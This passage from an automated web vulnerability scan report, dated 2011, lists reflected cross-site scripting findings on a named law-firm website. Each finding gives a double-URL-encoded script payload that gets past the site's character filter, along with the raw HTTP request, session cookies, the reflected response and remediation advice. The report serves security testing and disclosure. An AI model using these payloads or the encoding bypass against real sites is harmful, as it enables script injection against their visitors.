The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/main.css78b32"><script>alert(1)</script>b5e2c8ed40b" value="">
...[SNIP]...

2.65. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css78055"><script>alert(1)</script>a8d52b987de/ui/ui.accordion.css" value="">
...[SNIP]...

2.66. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui801be"><script>alert(1)</script>35c17289cf6/ui.accordion.css" value="">
...[SNIP]...

2.67. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.accordion.cssa2a82"><script>alert(1)</script>b61ee3f3a8a" value="">
...[SNIP]...

2.68. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css874a6"><script>alert(1)</script>bba185a7c96/ui/ui.all.css" value="">
...[SNIP]...

2.69. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3782d"><script>alert(1)</script>27d4aec5989/ui.all.css" value="">
...[SNIP]...

2.70. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.all.cssc332a"><script>alert(1)</script>b48dfbd1665" value="">
...[SNIP]...

2.71. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css9aa04"><script>alert(1)</script>3f73509fbde/ui/ui.base.css" value="">
...[SNIP]...

2.72. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uia32e5"><script>alert(1)</script>b7ea1967ea4/ui.base.css" value="">
...[SNIP]...

2.73. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.base.cssa4008"><script>alert(1)</script>674bcd1bc31" value="">
...[SNIP]...

2.74. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csscfd19"><script>alert(1)</script>32dc5bc06f/ui/ui.core.css" value="">
...[SNIP]...

2.75. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uicac63"><script>alert(1)</script>5d010f954eb/ui.core.css" value="">
...[SNIP]...

2.76. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.core.cssc6878"><script>alert(1)</script>49980770f59" value="">
...[SNIP]...

2.77. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssfbf73"><script>alert(1)</script>f798e920d23/ui/ui.datepicker.css" value="">
...[SNIP]...

2.78. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
